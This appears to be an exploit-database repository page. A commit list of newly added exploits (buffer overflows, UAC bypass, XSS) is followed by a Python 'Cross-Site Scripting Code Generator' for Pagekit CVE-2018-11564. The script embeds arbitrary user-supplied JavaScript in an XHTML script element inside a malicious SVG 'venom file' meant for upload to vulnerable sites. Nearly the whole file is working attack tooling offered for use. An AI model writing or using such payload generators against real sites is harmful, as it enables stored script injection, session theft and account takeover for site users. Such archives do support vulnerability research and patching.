ad4b4f15f3
11 changes to exploits/shellcodes Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit) Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit) Clone2GO Video converter 2.8.2 - Buffer Overflow 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH) 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH) 10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH) WebKitGTK+ < 2.21.3 - Crash (PoC) WebKit - not_number defineProperties UAF (Metasploit) EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting Pagekit < 1.0.13 - Cross-Site Scripting Code Generator Brother HL Series Printers 1.15 - Cross-Site Scripting Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)
33 lines
No EOL
1.2 KiB
Python
Executable file
33 lines
No EOL
1.2 KiB
Python
Executable file
# Title: Pagekit < 1.0.13 - Cross-Site Scripting Code Generator
|
|
# Author : DEEPIN2
|
|
# Date: 2018-06-05
|
|
# Vendor: Pagekit
|
|
# Sotware: https://pagekit.com/
|
|
# Version: < 1.0.13
|
|
# CVE: 2018-11564
|
|
# python3 required
|
|
|
|
def makesvg(name, code):
|
|
code = '<exploit:script xmlns:exploit="http://www.w3.org/1999/xhtml">' + code + '</exploit:script>'
|
|
f = open(name, 'w+')
|
|
f.write(code)
|
|
f.close
|
|
|
|
|
|
if __name__ == '__main__':
|
|
print('''
|
|
______ _______ ____ ___ _ ___ _ _ ____ __ _ _
|
|
/ ___\ \ / / ____| |___ \ / _ \/ |( _ ) / / | ___| / /_ | || |
|
|
| | \ \ / /| _| _____ __) | | | | |/ _ \ _____| | |___ \| '_ \| || |_
|
|
| |___ \ V / | |__|_____/ __/| |_| | | (_) |_____| | |___) | (_) |__ _|
|
|
\____| \_/ |_____| |_____|\___/|_|\___/ |_|_|____/ \___/ |_|
|
|
[*] Author : DEEPIN2(Junseo Lee)''')
|
|
print('[*] enter name without extension, ex) test.svg -> test')
|
|
filename = input('Filename : ') + '.svg'
|
|
print('[*] If you want to use alert(), type "alert("bla..bla..")"')
|
|
scriptcode = input('Script code : ')
|
|
try:
|
|
makesvg(filename, scriptcode)
|
|
print('[+] Successfully make venom file "%s"' %filename)
|
|
except Error as e:
|
|
print(e) |